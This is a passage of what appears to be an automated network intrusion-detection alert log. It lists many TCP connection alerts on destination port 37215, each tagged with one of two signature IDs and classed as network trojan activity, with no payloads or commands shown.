          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085492
          SID:2829579
          Source Port:60098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471730
          SID:2829579
          Source Port:60040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644929
          SID:2829579
          Source Port:43888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476937
          SID:2829579
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867236
          SID:2835222
          Source Port:36016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724239
          SID:2829579
          Source Port:39774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414244
          SID:2835222
          Source Port:41994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540430
          SID:2829579
          Source Port:42288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924452
          SID:2835222
          Source Port:38780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721221
          SID:2829579
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413950
          SID:2835222
          Source Port:34768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914377
          SID:2829579
          Source Port:55884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677125
          SID:2829579
          Source Port:47808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928217
          SID:2835222
          Source Port:37344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678006
          SID:2829579
          Source Port:56130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271797
          SID:2829579
          Source Port:36898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929186
          SID:2835222
          Source Port:55186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278981
          SID:2835222
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929892
          SID:2835222
          Source Port:38974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164399
          SID:2835222
          Source Port:56330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946715
          SID:2835222
          Source Port:46506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035000
          SID:2829579
          Source Port:55908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398976
          SID:2829579
          Source Port:56524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396820
          SID:2835222
          Source Port:39954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397581
          SID:2829579
          Source Port:49242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102602
          SID:2835222
          Source Port:35070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299752
          SID:2829579
          Source Port:34846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399077
          SID:2829579
          Source Port:52958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038591
          SID:2829579
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468394
          SID:2829579
          Source Port:56048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947485
          SID:2835222
          Source Port:41316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720180
          SID:2835222
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165738
          SID:2835222
          Source Port:43792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031395
          SID:2829579
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.940039
          SID:2829579
          Source Port:59072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079844
          SID:2829579
          Source Port:60906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996267
          SID:2835222
          Source Port:37030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207782
          SID:2829579
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272871
          SID:2835222
          Source Port:60542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018032
          SID:2829579
          Source Port:60560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037726
          SID:2829579
          Source Port:54854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206297
          SID:2835222
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.015056
          SID:2835222
          Source Port:52862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244028
          SID:2835222
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400060
          SID:2835222
          Source Port:47690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223112
          SID:2829579
          Source Port:55134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465399
          SID:2835222
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226848
          SID:2829579
          Source Port:60920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035912
          SID:2835222
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466855
          SID:2835222
          Source Port:35506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469725
          SID:2829579
          Source Port:59226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028040
          SID:2829579
          Source Port:51344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166218
          SID:2829579
          Source Port:48076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567681
          SID:2829579
          Source Port:47862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920393
          SID:2835222
          Source Port:39036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397217
          SID:2835222
          Source Port:45734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160262
          SID:2829579
          Source Port:40478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998551
          SID:2835222
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.313982
          SID:2835222
          Source Port:50432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715506
          SID:2835222
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033627
          SID:2835222
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557162
          SID:2829579
          Source Port:42294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692150
          SID:2835222
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287042
          SID:2835222
          Source Port:40234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417610
          SID:2835222
          Source Port:44640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103836
          SID:2835222
          Source Port:33390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466999
          SID:2835222
          Source Port:39756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892856
          SID:2835222
          Source Port:46082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282148
          SID:2829579
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167991
          SID:2829579
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539560
          SID:2835222
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417406
          SID:2835222
          Source Port:48446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399017
          SID:2835222
          Source Port:60396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033765
          SID:2835222
          Source Port:45172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643404
          SID:2835222
          Source Port:38384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948595
          SID:2835222
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563412
          SID:2835222
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538745
          SID:2835222
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080726
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032679
          SID:2829579
          Source Port:33356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014362
          SID:2835222
          Source Port:41120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866002
          SID:2835222
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093304
          SID:2835222
          Source Port:41046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2829579
          Source Port:60526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034665
          SID:2829579
          Source Port:33010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290206
          SID:2835222
          Source Port:48064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222792
          SID:2835222
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289937
          SID:2829579
          Source Port:35652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716034
          SID:2829579
          Source Port:49110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034859
          SID:2829579
          Source Port:39130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206911
          SID:2835222
          Source Port:44092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993603
          SID:2835222
          Source Port:51480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164520
          SID:2835222
          Source Port:41650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120583
          SID:2829579
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721256
          SID:2835222
          Source Port:52386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.094496
          SID:2829579
          Source Port:59196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284762
          SID:2829579
          Source Port:44742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568388
          SID:2829579
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164612
          SID:2829579
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413517
          SID:2829579
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417381
          SID:2835222
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945116
          SID:2835222
          Source Port:59500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989702
          SID:2835222
          Source Port:41622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160467
          SID:2835222
          Source Port:47450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538760
          SID:2835222
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821094
          SID:2829579
          Source Port:55500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169266
          SID:2829579
          Source Port:38560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945715
          SID:2835222
          Source Port:39658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242608
          SID:2829579
          Source Port:57866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605713
          SID:2835222
          Source Port:47930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862068
          SID:2829579
          Source Port:55244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991922
          SID:2835222
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285926
          SID:2829579
          Source Port:43434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947456
          SID:2835222
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469326
          SID:2835222
          Source Port:42858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272682
          SID:2835222
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718035
          SID:2829579
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718721
          SID:2829579
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558680
          SID:2835222
          Source Port:55754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166442
          SID:2829579
          Source Port:60272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078496
          SID:2835222
          Source Port:40226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719466
          SID:2829579
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252446
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822159
          SID:2829579
          Source Port:54602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034009
          SID:2829579
          Source Port:41286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166031
          SID:2829579
          Source Port:43470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396305
          SID:2835222
          Source Port:56546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289431
          SID:2829579
          Source Port:60580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539326
          SID:2829579
          Source Port:52232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916462
          SID:2835222
          Source Port:57316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564257
          SID:2829579
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647674
          SID:2835222
          Source Port:45276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088208
          SID:2835222
          Source Port:41046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268390
          SID:2835222
          Source Port:52558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987489
          SID:2835222
          Source Port:60500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206567
          SID:2835222
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998788
          SID:2835222
          Source Port:38538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224125
          SID:2835222
          Source Port:39184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017571
          SID:2835222
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644842
          SID:2835222
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860582
          SID:2835222
          Source Port:42704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.698426
          SID:2829579
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490206
          SID:2835222
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399499
          SID:2829579
          Source Port:48396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168942
          SID:2829579
          Source Port:55268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248746
          SID:2835222
          Source Port:46342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929430
          SID:2829579
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989690
          SID:2829579
          Source Port:56228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567333
          SID:2835222
          Source Port:46496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647608
          SID:2835222
          Source Port:35320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267347
          SID:2829579
          Source Port:44832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870525
          SID:2835222
          Source Port:33908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820118
          SID:2829579
          Source Port:57862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075618
          SID:2829579
          Source Port:45668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035698
          SID:2835222
          Source Port:49144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400049
          SID:2835222
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018151
          SID:2835222
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396464
          SID:2829579
          Source Port:45176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129430
          SID:2829579
          Source Port:53828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243694
          SID:2835222
          Source Port:54884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644444
          SID:2829579
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034941
          SID:2829579
          Source Port:47458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718267
          SID:2829579
          Source Port:57396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466067
          SID:2829579
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869127
          SID:2835222
          Source Port:43902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.307521
          SID:2829579
          Source Port:48396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599292
          SID:2829579
          Source Port:36924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926105
          SID:2835222
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466674
          SID:2835222
          Source Port:50280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418349
          SID:2829579
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.554139
          SID:2835222
          Source Port:49928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947713
          SID:2835222
          Source Port:59922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905347
          SID:2835222
          Source Port:60694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008654
          SID:2829579
          Source Port:43306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291182
          SID:2829579
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466841
          SID:2829579
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819396
          SID:2829579
          Source Port:42322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651684
          SID:2835222
          Source Port:33968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465435
          SID:2835222
          Source Port:45922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717978
          SID:2829579
          Source Port:52936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566336
          SID:2835222
          Source Port:53930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931539
          SID:2829579
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284983
          SID:2829579
          Source Port:57960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038107
          SID:2835222
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.098262
          SID:2835222
          Source Port:39604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990434
          SID:2835222
          Source Port:59328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165113
          SID:2829579
          Source Port:50846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721509
          SID:2835222
          Source Port:37504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287978
          SID:2829579
          Source Port:59576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948435
          SID:2829579
          Source Port:40912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928295
          SID:2829579
          Source Port:52126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036257
          SID:2835222
          Source Port:52114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716243
          SID:2829579
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820876
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163824
          SID:2835222
          Source Port:54808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166246
          SID:2829579
          Source Port:53364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562019
          SID:2829579
          Source Port:53530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
